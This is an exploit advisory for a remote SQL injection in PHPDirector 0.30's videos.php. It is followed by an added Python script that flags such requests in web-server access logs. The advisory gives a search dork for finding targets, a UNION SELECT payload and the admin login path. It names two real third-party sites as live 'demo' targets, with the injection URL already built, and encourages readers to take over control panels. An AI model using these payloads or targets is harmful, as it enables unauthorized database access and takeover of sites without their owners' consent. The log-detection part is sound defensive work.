PHPDirector 0.30 remote SQL injection

2010.06.30
Credit: Mr-AbdoX
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

======================================================================
 PHPDirector 0.30 (videos.php) SQL Injection Vulnerability           #
======================================================================
# Date         : 29/06/2010                                          #
# Author       : Mr-AbdoX                                            #
# Emails       : Y6u@HoTmaiL.Com & Oz1@HoTmaiL.Com                   #
# My web Sites : http://Sec-Eviles.com/vb & http://Arspam.com/       #
# Script home  : www.phpdirector.co.uk/                              #
# Tested on    : Linux & Windows                                     #
=================Exploit==============================================

Dork: [Powered by: PHPDirector 0.30] 0r [ inurl:videos.php?id= ]

[~] ExploiT [~]

http://www.site.com/videos.php?id=[SQL]

union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--

[~] ConTroL Panel (admin login) [~]

http://www.site.com/login.php

[~] demo [~]

http://www.onevent.biz/paramore/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
http://www.videoindirizle.com/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--

enjoy in control panel Like U WanT :p
Don't Forget greetz Me... Peace

[~] GreetZ To [~]

The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz
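Added example, not part of the original advisory or of PHPDirector: a web-server log check for the request shape shown above, assuming the id parameter of videos.php is normally a plain integer. The log lines, addresses and the scan() function are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP range).
SAMPLE_LOG = '''\
192.0.2.10 - - [29/Jun/2010:10:01:02 +0000] "GET /videos.php?id=56 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [29/Jun/2010:10:03:40 +0000] "GET /videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
192.0.2.44 - - [29/Jun/2010:10:04:11 +0000] "GET /media/videos.php?id=-56%20UNION%20SELECT%201,2 HTTP/1.1" 200 5290 "-" "Mozilla/5.0"
192.0.2.77 - - [29/Jun/2010:10:05:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
UNION_RE = re.compile(r'\bunion\b.*\bselect\b', re.I | re.S)
INTEGER_RE = re.compile(r'[0-9]+')


def scan(log_text, script="/videos.php", param="id"):
    """Return a finding for every request to `script` whose `param`
    is not a plain non-negative integer (assumed legitimate form)."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, when, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue
        # parse_qs percent-decodes and turns '+' into a space, so the
        # encoded and unencoded forms normalise to the same string.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if INTEGER_RE.fullmatch(value):
                continue
            kind = "union_select" if UNION_RE.search(value) else "non_numeric_id"
            findings.append({"client": client, "time": when,
                             "status": int(status), "kind": kind,
                             "value": value})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["client"], f["status"], f["kind"], repr(f["value"]))
```

A 200 response on a flagged request is worth following up against login.php activity from the same client, since the advisory points at the admin control panel.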



Copyright 2019, cxsecurity.com

 
